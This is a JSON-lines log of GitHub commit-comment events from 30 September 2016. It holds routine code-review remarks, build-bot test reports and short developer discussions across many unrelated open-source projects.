{"id":"4644938867","type":"CommitCommentEvent","actor":{"login":"tmtmtmtm"},"repo":{"name":"everypolitician-scrapers/macedonia-sobranie"},"payload":{"comment":{"id":19245458,"position":null,"line":null,"path":null,"commit_id":"a6482a6a506ce4d3bb2608e3476d6a8e2d5dad67","created_at":"2016-09-30T18:01:37Z","updated_at":"2016-09-30T18:01:37Z","body":"I think this needs a commit message to explain why you've done this, as it's not particularly obvious."}},"created_at":"2016-09-30T18:01:37Z"}
{"id":"4644939061","type":"CommitCommentEvent","actor":{"login":"brunotm"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19245460,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-30T18:01:39Z","updated_at":"2016-09-30T18:01:39Z","body":"@msterin @govint \r\n\r\nI hadn't time to look at the test infrastructure yet, but i remembered that we might hit a corner case with the tests. We cannot know for sure whether a test from docker create command should fail or succeed when dealing with concurrency with the same volume.\r\n\r\nWe are managing concurrency at the volume level, but by **request** , and create command is a group them. - I also think we might see more cases like this as new features get implemented.\r\n\r\nI don't expect this to be a common case, but a anomalous condition when we have  one or more hosts trying to create or remove volumes with the same name simultaneously.\r\n\r\nBut to successfully test and protect this scenario, we may have to introduce a \"transaction\" lock, where the plugin commands explicitly require the lock to the server and release it after the work is done. \r\n\r\nSo this would change interfaces at the driver, plugin and the server and would be a little more complex as we also would need timeouts for the locks.\r\n\r\nWhat do you think?\r\n"}},"created_at":"2016-09-30T18:01:39Z"}
{"id":"4644939919","type":"CommitCommentEvent","actor":{"login":"jstebbins"},"repo":{"name":"HandBrake/HandBrake"},"payload":{"comment":{"id":19245464,"position":null,"line":null,"path":null,"commit_id":"d3985316111dc8c995bd1e2fe6dcfc700ea30d0b","created_at":"2016-09-30T18:01:48Z","updated_at":"2016-09-30T18:01:48Z","body":"Looking at the commit history and information in .hg_archive.txt, this is what I think happened.  \r\n\r\nThey manually keep a .hgtags file that they add hash and tag label to as they do releases, this gets committed to the repo.  It appears .hg_archive.txt gets generated when they create the release tar, it does not get committed.  \r\n\r\nFor the 2.0 release, .hg_archive.txt was generated based on the commit for the 2.0 tag.  For the 2.1 release .hg_archive.txt was generated based on the commit that updated .hgtags with the latest 2.1 tag.  \r\n\r\nSo in the 2.1 case, .hg_archive.txt actually identifies a commit that happened after the tag was applied.  This was probably an error in generating the release tar.  And the version.cmake script definitely has a bug in generating version info in this scenario.\r\n\r\nI can create a patch to fix the version info, but I'm not sure it's worth the effort."}},"created_at":"2016-09-30T18:01:48Z"}
{"id":"4644944120","type":"CommitCommentEvent","actor":{"login":"grahamaj"},"repo":{"name":"webpro-patch/bootstrap"},"payload":{"comment":{"id":19245476,"position":null,"line":null,"path":null,"commit_id":"08441d27a9e2dab1ba1c086e9d0a14b2083f9c5a","created_at":"2016-09-30T18:02:37Z","updated_at":"2016-09-30T18:02:37Z","body":"@sbowler Is this all that is needed for the change of the warning color?"}},"created_at":"2016-09-30T18:02:37Z"}
{"id":"4644950037","type":"CommitCommentEvent","actor":{"login":"jvarness"},"repo":{"name":"npm/npm-expansions"},"payload":{"comment":{"id":19245502,"position":5,"line":14,"path":"expansions.txt","commit_id":"058c3d392dff0101015c2575d22f33e234b755e8","created_at":"2016-09-30T18:03:47Z","updated_at":"2016-09-30T18:03:47Z","body":"https://en.wikipedia.org/wiki/Knights_who_say_Ni"}},"created_at":"2016-09-30T18:03:47Z"}
{"id":"4644952537","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19245511,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T18:04:17Z","updated_at":"2016-09-30T18:04:17Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2379 of 2379 tests passed, 3 test warnings)\n\n * 3 tests had: AUD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-30T18:04:17Z"}
{"id":"4644955911","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19245518,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T18:04:59Z","updated_at":"2016-09-30T18:04:59Z","body":"Preferisco aggiungere, se @flodolo è d'accordo per me può andare.\n\n\n\n"}},"created_at":"2016-09-30T18:04:59Z"}
{"id":"4644969775","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19245553,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T18:07:45Z","updated_at":"2016-09-30T18:07:45Z","body":"EMSIllumSetPoint (wfbuhl) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-30T18:07:45Z"}
{"id":"4644981950","type":"CommitCommentEvent","actor":{"login":"smeroni68"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19245581,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T18:10:13Z","updated_at":"2016-09-30T18:10:13Z","body":"We already try this but we discover that JDC Twrp do not allow kmsg extraction... Official Twrp does... but vzw Official recovery is not installable because give soft brick... I'm contacting a 720 and R970 users to understand if they are able to use official twrp, so we can try to get the log you need... will update here about it."}},"created_at":"2016-09-30T18:10:13Z"}
{"id":"4644986460","type":"CommitCommentEvent","actor":{"login":"Okalia"},"repo":{"name":"Okalia/PersonalBlog"},"payload":{"comment":{"id":19245599,"position":null,"line":null,"path":null,"commit_id":"42384a4ffd8898c556a10359d11d60d49e17807b","created_at":"2016-09-30T18:11:05Z","updated_at":"2016-09-30T18:11:05Z","body":"![default](https://cloud.githubusercontent.com/assets/11776810/19001946/64bb15e0-8752-11e6-9dd7-2037e33a4a4b.png)\r\n"}},"created_at":"2016-09-30T18:11:05Z"}
{"id":"4644988667","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19245605,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T18:11:30Z","updated_at":"2016-09-30T18:11:30Z","body":"but the Mereti/Sestor will never be friendly unless you edit the game/save? (they are automaton so their reputation never change)"}},"created_at":"2016-09-30T18:11:30Z"}
{"id":"4644989593","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19245610,"position":null,"line":null,"path":null,"commit_id":"5f25c7363534656ce6e1ecac63ca694e6d4ba7d6","created_at":"2016-09-30T18:11:41Z","updated_at":"2016-09-30T18:11:41Z","body":"`define CRYPTOPP_UNUSED(x) ((void)x);` was later changed to `define CRYPTOPP_UNUSED(x) ((void)(x));`."}},"created_at":"2016-09-30T18:11:41Z"}
{"id":"4644990200","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19245615,"position":5,"line":358,"path":"openstudiocore/ProjectMacros.cmake","commit_id":"6f9687221220804678df8fb124ce3ff22815fc11","created_at":"2016-09-30T18:11:48Z","updated_at":"2016-09-30T18:11:48Z","body":"@kbenne this seems to be having a, impact on the order that swig happens during the build process, was that intended?"}},"created_at":"2016-09-30T18:11:48Z"}
{"id":"4645001887","type":"CommitCommentEvent","actor":{"login":"millerw8"},"repo":{"name":"codice/ddf"},"payload":{"comment":{"id":19245664,"position":321,"line":283,"path":"catalog/spatial/csw/spatial-csw-common/src/main/java/org/codice/ddf/spatial/ogc/csw/catalog/common/CswConstants.java","commit_id":"e6cb71d15d1a4f892b2b2dd4b8dda081c0e96974","created_at":"2016-09-30T18:14:09Z","updated_at":"2016-09-30T18:14:09Z","body":"why do we recreate constants instead of just using the original constants ?"}},"created_at":"2016-09-30T18:14:09Z"}
{"id":"4645015518","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19245699,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T18:16:48Z","updated_at":"2016-09-30T18:16:48Z","body":"Non è un problema aggiungere, solo controllare che la colonna non risulti sbilanciata rispetto all'altra."}},"created_at":"2016-09-30T18:16:48Z"}
{"id":"4645015926","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19245702,"position":null,"line":null,"path":null,"commit_id":"b8fe3163051c9f7423aa3fa108eb9063b5e5445d","created_at":"2016-09-30T18:16:52Z","updated_at":"2016-09-30T18:16:52Z","body":"EMSIllumSetPoint (wfbuhl) - i386-Windows-7-VisualStudio-12: OK (2342 of 2345 tests passed, 3 test warnings)\n\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 3 tests had: AUD diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b8fe3163051c9f7423aa3fa108eb9063b5e5445d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-30T18:16:52Z"}
{"id":"4645020603","type":"CommitCommentEvent","actor":{"login":"bcse"},"repo":{"name":"bcse/stringscore"},"payload":{"comment":{"id":19245716,"position":null,"line":null,"path":null,"commit_id":"166d6df9ad0691eaac898cc8933f43b271875149","created_at":"2016-09-30T18:17:46Z","updated_at":"2016-09-30T18:17:46Z","body":"https://bitbucket.org/ned/coveragepy/issues/407/\r\nPython 3.2 doesn't support u\"\" strings, which makes it difficult to get Unicode right across a wide span of versions. "}},"created_at":"2016-09-30T18:17:46Z"}
{"id":"4645023387","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19245721,"position":null,"line":null,"path":null,"commit_id":"627c3d6c92a48d0f1db9a31900dc65c6f1e64a7b","created_at":"2016-09-30T18:18:19Z","updated_at":"2016-09-30T18:18:19Z","body":"Good change to remove a listener"}},"created_at":"2016-09-30T18:18:19Z"}
{"id":"4645024220","type":"CommitCommentEvent","actor":{"login":"dawnpm"},"repo":{"name":"GSA/punchcard"},"payload":{"comment":{"id":19245724,"position":null,"line":null,"path":null,"commit_id":"fb0e23379738295a9b19ab58dfc5f1d5f9f50408","created_at":"2016-09-30T18:18:28Z","updated_at":"2016-09-30T18:18:28Z","body":"@noremmie what sort of hate are the specs exhibiting? Should I follow up with State for a different treatment of these particular terms?"}},"created_at":"2016-09-30T18:18:28Z"}
{"id":"4645029323","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"fakereplace/fakereplace"},"payload":{"comment":{"id":19245736,"position":4,"line":97,"path":"core/src/main/java/org/fakereplace/transformation/UnmodifiedFileIndex.java","commit_id":"99500a362cd92ff86053562cab9e335947083124","created_at":"2016-09-30T18:19:26Z","updated_at":"2016-09-30T18:19:26Z","body":"I can't reproduce it but I managed to get an NPE on this line. Technically parent can be null"}},"created_at":"2016-09-30T18:19:26Z"}
{"id":"4645031887","type":"CommitCommentEvent","actor":{"login":"mhegazy"},"repo":{"name":"Microsoft/TypeScript"},"payload":{"comment":{"id":19245739,"position":null,"line":null,"path":null,"commit_id":"7cb2a643503698d3da5469b01d1a8fcd67d2125f","created_at":"2016-09-30T18:19:55Z","updated_at":"2016-09-30T18:19:55Z","body":"@jonguan please see https://github.com/Microsoft/TypeScript/issues/3500 for related discussion. "}},"created_at":"2016-09-30T18:19:55Z"}
{"id":"4645033515","type":"CommitCommentEvent","actor":{"login":"anoopknr"},"repo":{"name":"anoopknr/-TURBO-C-GUI"},"payload":{"comment":{"id":19245744,"position":1,"line":1,"path":"README.md","commit_id":"a01f4938ece17ab9113e3765b67f456fbce93593","created_at":"2016-09-30T18:20:15Z","updated_at":"2016-09-30T18:20:15Z","body":"Here I upload few graphical C++ program created by me in Turbo C++. "}},"created_at":"2016-09-30T18:20:15Z"}
{"id":"4645035307","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19245749,"position":33,"line":33,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T18:20:35Z","updated_at":"2016-09-30T18:20:35Z","body":"Maybe arguments or args instead of attributes since they are just arguments passed in, they're not attributes for the share yet.  Attributes is easy to confuse with the attributes getter/setter on AR objects."}},"created_at":"2016-09-30T18:20:35Z"}
{"id":"4645038011","type":"CommitCommentEvent","actor":{"login":"kareila"},"repo":{"name":"dreamwidth/dw-free"},"payload":{"comment":{"id":19245763,"position":6,"line":107,"path":"styles/goldleaf/layout.s2","commit_id":"5d80de3dd3a94504e8d8049af45f741bbfc45ff6","created_at":"2016-09-30T18:21:06Z","updated_at":"2016-09-30T18:21:06Z","body":"Uh, 100bbbbbbbbbbb?  What does that do? :)"}},"created_at":"2016-09-30T18:21:06Z"}
{"id":"4645044645","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19245771,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-30T18:22:18Z","updated_at":"2016-09-30T18:22:18Z","body":"> So this would change interfaces at the driver, plugin and the server and would be a little more complex as we also would need timeouts for the locks. \r\n\r\nThat is exactly the reason the full  \"make it concurrent\" change was postponed for so long :-) and I think full concurrency can stay postponed.  \r\n\r\nBTW - the use case for full concurrency is a boot storm when multiple containers suddenly start on the same Docker engine and many of them want to attach a volume.  But making it concurrent is pointless since it will still be serialized by ESX (VM Monitor) doing the attach operation on a VM. So, if we want to solve boot storm, we need to introduce some buffering and bulk execution of requests , by paying extra 1/2 sec or so delay for all mounts. Which is certainly out of scope for this change, IMO.\r\n\r\nI think your patch is a great step in the right direction, and removes the most annoying aspect of serialization - waiting behind requests from **other** docker engines the same ESX host, so I am all for bringing it in.\r\n\r\n> We cannot know for sure whether a test from docker create command should fail or succeed when dealing with concurrency with the same volume. \r\n\r\nCorrect, but we know for sure that at least one request should succeed, and looking at the log we should be able to find this out - as long as the others failing in the correct timestamps. \r\nTest here is probably more costly that the actual code though. \r\n\r\n> I don't expect this to be a common case, but a anomalous condition when we have one or more hosts trying to create or remove volumes with the same name simultaneously.\r\n\r\nGood point, I agree - so think it's more important to have automation for testing multiple volume request from different engines complete without waiting for each other - which is what your log indicates you've tested (manually?)"}},"created_at":"2016-09-30T18:22:18Z"}
{"id":"4645048584","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19245783,"position":null,"line":null,"path":null,"commit_id":"29dc22241f086a81bac2d2f9b6b27d67539bda90","created_at":"2016-09-30T18:23:00Z","updated_at":"2016-09-30T18:23:00Z","body":"Sounds like a good idea. "}},"created_at":"2016-09-30T18:23:00Z"}
{"id":"4645051094","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19245788,"position":36,"line":36,"path":"lib/admin.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T18:23:27Z","updated_at":"2016-09-30T18:23:27Z","body":"typo!"}},"created_at":"2016-09-30T18:23:27Z"}
{"id":"4645051917","type":"CommitCommentEvent","actor":{"login":"rtownson"},"repo":{"name":"nrc-cnrc/EGSnrc"},"payload":{"comment":{"id":19245789,"position":46,"line":476,"path":"HEN_HOUSE/egs++/egs_ensdf.cpp","commit_id":"f763c60c5193e127c409fd64bfd6171e26024049","created_at":"2016-09-30T18:23:37Z","updated_at":"2016-09-30T18:23:37Z","body":"Yes! Was planning to wait until that pull request was merged then change these `1e-10` to `epsilon`."}},"created_at":"2016-09-30T18:23:37Z"}
{"id":"4645052150","type":"CommitCommentEvent","actor":{"login":"MPolymath"},"repo":{"name":"soixantecircuits/spacebro-client"},"payload":{"comment":{"id":19245792,"position":3,"line":3,"path":"dist/mdns.js","commit_id":"a568714f4d0582d1857a7d650d736a91d942bd8c","created_at":"2016-09-30T18:23:40Z","updated_at":"2016-09-30T18:23:40Z","body":"This should be around a `if (typeof window === undefined) ` isnt it? cc @gabrielstuff "}},"created_at":"2016-09-30T18:23:40Z"}
{"id":"4645053425","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19245794,"position":null,"line":null,"path":null,"commit_id":"3fe55f6f91ec106b6f446cf18aee1594d1a8bd78","created_at":"2016-09-30T18:23:52Z","updated_at":"2016-09-30T18:23:52Z","body":"@Trott PR-URL includes the patch."}},"created_at":"2016-09-30T18:23:52Z"}
{"id":"4645055511","type":"CommitCommentEvent","actor":{"login":"thijstriemstra"},"repo":{"name":"twisted/twisted"},"payload":{"comment":{"id":19245799,"position":13,"line":47,"path":"src/twisted/web/test/test_http.py","commit_id":"2a9091c1fdaceaf3ffbc32edcdb7cb6b953a1bef","created_at":"2016-09-30T18:24:16Z","updated_at":"2016-09-30T18:24:16Z","body":"should use `test_`"}},"created_at":"2016-09-30T18:24:16Z"}
{"id":"4645057492","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19245805,"position":null,"line":null,"path":null,"commit_id":"fe2e119b251dd2c732fe0d20d08ac1ac61f836d2","created_at":"2016-09-30T18:24:38Z","updated_at":"2016-09-30T18:24:38Z","body":"Yes, but it's not a word that seems like it fits the intended meaning here."}},"created_at":"2016-09-30T18:24:38Z"}
{"id":"4645057944","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19245806,"position":1,"line":1,"path":"lib/api.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T18:24:43Z","updated_at":"2016-09-30T18:24:43Z","body":"remove?"}},"created_at":"2016-09-30T18:24:43Z"}
{"id":"4645059166","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19245812,"position":null,"line":null,"path":null,"commit_id":"88f2a4a84dd38aa05b36076eba2ebea6ca217c8a","created_at":"2016-09-30T18:24:56Z","updated_at":"2016-09-30T18:24:56Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-30T18:24:56Z"}
{"id":"4645060469","type":"CommitCommentEvent","actor":{"login":"basma2"},"repo":{"name":"basma2/examples"},"payload":{"comment":{"id":19245817,"position":7,"line":7,"path":"albo3952-Lab02.sh","commit_id":"3ea99636ea5ed83136bbaa4c2a894db079bf2ff7","created_at":"2016-09-30T18:25:11Z","updated_at":"2016-09-30T18:25:11Z","body":"mkdir -p main/{A/{B,C,D},E/{F,G},H/{I,J/{K,L},M}}\r\ntouch main/{A/{aa,B/bb,C/cc,D/dd},E/{ee,F/ff,G/gg},H/{hh,I/ii,J/{jj,K/kk,L/ll},M/mm}}"}},"created_at":"2016-09-30T18:25:11Z"}
{"id":"4645067896","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19245832,"position":1,"line":1,"path":"lib/api.js","commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T18:26:29Z","updated_at":"2016-09-30T18:26:29Z","body":"Nevermind. I see it's a vLater thing farther down."}},"created_at":"2016-09-30T18:26:29Z"}
{"id":"4645069118","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19245835,"position":30,"line":30,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T18:26:41Z","updated_at":"2016-09-30T18:26:41Z","body":"What happened to required arguments?  We have a check for user below when we may want to just require it in the keyargs?"}},"created_at":"2016-09-30T18:26:41Z"}
{"id":"4645069278","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245838,"position":9,"line":13,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:26:43Z","updated_at":"2016-09-30T18:26:43Z","body":"MySQL and MariaDB are the same, right?"}},"created_at":"2016-09-30T18:26:43Z"}
{"id":"4645072082","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245847,"position":50,"line":44,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:27:13Z","updated_at":"2016-09-30T18:27:13Z","body":"To respect CS, CommonDb, no?"}},"created_at":"2016-09-30T18:27:13Z"}
{"id":"4645073111","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245852,"position":70,"line":51,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:27:25Z","updated_at":"2016-09-30T18:27:25Z","body":"CS: orderBy"}},"created_at":"2016-09-30T18:27:25Z"}
{"id":"4645073923","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245855,"position":74,"line":55,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:27:34Z","updated_at":"2016-09-30T18:27:34Z","body":"CS: fetchAll"}},"created_at":"2016-09-30T18:27:34Z"}
{"id":"4645074473","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19245857,"position":1,"line":1,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T18:27:39Z","updated_at":"2016-09-30T18:27:39Z","body":"👍  I like the name"}},"created_at":"2016-09-30T18:27:39Z"}
{"id":"4645075688","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245862,"position":69,"line":50,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:27:55Z","updated_at":"2016-09-30T18:27:55Z","body":"I've changed here because it seems incorrect to me... "}},"created_at":"2016-09-30T18:27:55Z"}
{"id":"4645076761","type":"CommitCommentEvent","actor":{"login":"ZudoMC"},"repo":{"name":"SamboyCoding/Shoplist-V2-Server"},"payload":{"comment":{"id":19245867,"position":7,"line":5,"path":"config/settings.example.php","commit_id":"3df487e8661940a3d835e5c4ba9490fe2a9ccf8e","created_at":"2016-09-30T18:28:07Z","updated_at":"2016-09-30T18:28:07Z","body":"lololololololol"}},"created_at":"2016-09-30T18:28:07Z"}
{"id":"4645080012","type":"CommitCommentEvent","actor":{"login":"dario-simonetti"},"repo":{"name":"zknill/points"},"payload":{"comment":{"id":19245872,"position":null,"line":null,"path":null,"commit_id":"394da1580f47d25b59cdcb8d46905f80a62c4ae3","created_at":"2016-09-30T18:28:43Z","updated_at":"2016-09-30T18:28:43Z","body":"Love this"}},"created_at":"2016-09-30T18:28:43Z"}
{"id":"4645081193","type":"CommitCommentEvent","actor":{"login":"weerd"},"repo":{"name":"DoSomething/onboarding-service"},"payload":{"comment":{"id":19245879,"position":null,"line":null,"path":null,"commit_id":"9e1d3c4da6a4ca010971ebe837f5ff27e01aba29","created_at":"2016-09-30T18:28:55Z","updated_at":"2016-09-30T18:28:55Z","body":"Just a comment on a typo. Seems good otherwise. 👍 "}},"created_at":"2016-09-30T18:28:55Z"}
{"id":"4645081410","type":"CommitCommentEvent","actor":{"login":"trasher"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19245880,"position":32,"line":29,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T18:28:57Z","updated_at":"2016-09-30T18:28:57Z","body":"Is this changed really required? Well, changes will be huge, but if we can limit a bit... :)"}},"created_at":"2016-09-30T18:28:57Z"}
{"id":"4645116936","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"ev3dev/ev3dev.github.io"},"payload":{"comment":{"id":19245996,"position":57,"line":188,"path":"docs/devtools/packaging-for-ev3dev.md","commit_id":"4cadb8eced7f7b81442f4edecec0077ce0aec807","created_at":"2016-09-30T18:35:26Z","updated_at":"2016-09-30T18:35:26Z","body":"Is raspbian `ARCH` correct here, or it may be replaced with `amd64` as well?"}},"created_at":"2016-09-30T18:35:26Z"}
{"id":"4645117206","type":"CommitCommentEvent","actor":{"login":"scottoasis"},"repo":{"name":"strongloop/loopback"},"payload":{"comment":{"id":19245998,"position":25,"line":86,"path":"server/middleware/token.js","commit_id":"b9170751bcd776360df9854fc8fd87b7ebe3fddb","created_at":"2016-09-30T18:35:29Z","updated_at":"2016-09-30T18:35:29Z","body":"@WardBeullens I ran into the above situation. After reading sources and commit history for a while I am sure that this statement is **intentional** (they assume that if you are using global registry, you SHOULD NOT use a customized AccessToken model) as now registry is configurable,\r\n\r\n```js\r\nlet app = module.exports = loopback({\r\n  localRegistry: true, // create app-specific registry\r\n  loadBuiltinModels: true // load built-in models (Application, AccessToken, User, etc)\r\n});\r\n```\r\n\r\nHope this helps. Thanks."}},"created_at":"2016-09-30T18:35:29Z"}
{"id":"4645125650","type":"CommitCommentEvent","actor":{"login":"dlech"},"repo":{"name":"ev3dev/ev3dev.github.io"},"payload":{"comment":{"id":19246011,"position":57,"line":188,"path":"docs/devtools/packaging-for-ev3dev.md","commit_id":"4cadb8eced7f7b81442f4edecec0077ce0aec807","created_at":"2016-09-30T18:37:00Z","updated_at":"2016-09-30T18:37:00Z","body":"it is correct. the raspbian archive only has the `armhf` arch, so `amd64` uploads will be rejected."}},"created_at":"2016-09-30T18:37:00Z"}
{"id":"4645130977","type":"CommitCommentEvent","actor":{"login":"tinchou"},"repo":{"name":"aspnet/JavaScriptServices"},"payload":{"comment":{"id":19246044,"position":38,"line":28,"path":"templates/Angular2Spa/webpack.config.js","commit_id":"e87aa1f08823296ea066544ae93dd225820ede60","created_at":"2016-09-30T18:38:00Z","updated_at":"2016-09-30T18:38:00Z","body":"Isn't `path.join(__dirname, \"wwwroot\", \"dist\")` more cross-platform friendly?"}},"created_at":"2016-09-30T18:38:00Z"}
{"id":"4645133200","type":"CommitCommentEvent","actor":{"login":"jrafanie"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19246049,"position":30,"line":30,"path":"lib/services/resource_sharer.rb","commit_id":"a3e09928ca4a590eb7b982afa18939c279790d48","created_at":"2016-09-30T18:38:24Z","updated_at":"2016-09-30T18:38:24Z","body":"doh, it was moved to initialize as opposed to passing arguments to share.  I see."}},"created_at":"2016-09-30T18:38:24Z"}
{"id":"4645134462","type":"CommitCommentEvent","actor":{"login":"Trott"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19246051,"position":null,"line":null,"path":null,"commit_id":"3fe55f6f91ec106b6f446cf18aee1594d1a8bd78","created_at":"2016-09-30T18:38:39Z","updated_at":"2016-09-30T18:38:39Z","body":"Argh, sorry. Insert standard rumination on the benefits of automation here. :-("}},"created_at":"2016-09-30T18:38:39Z"}
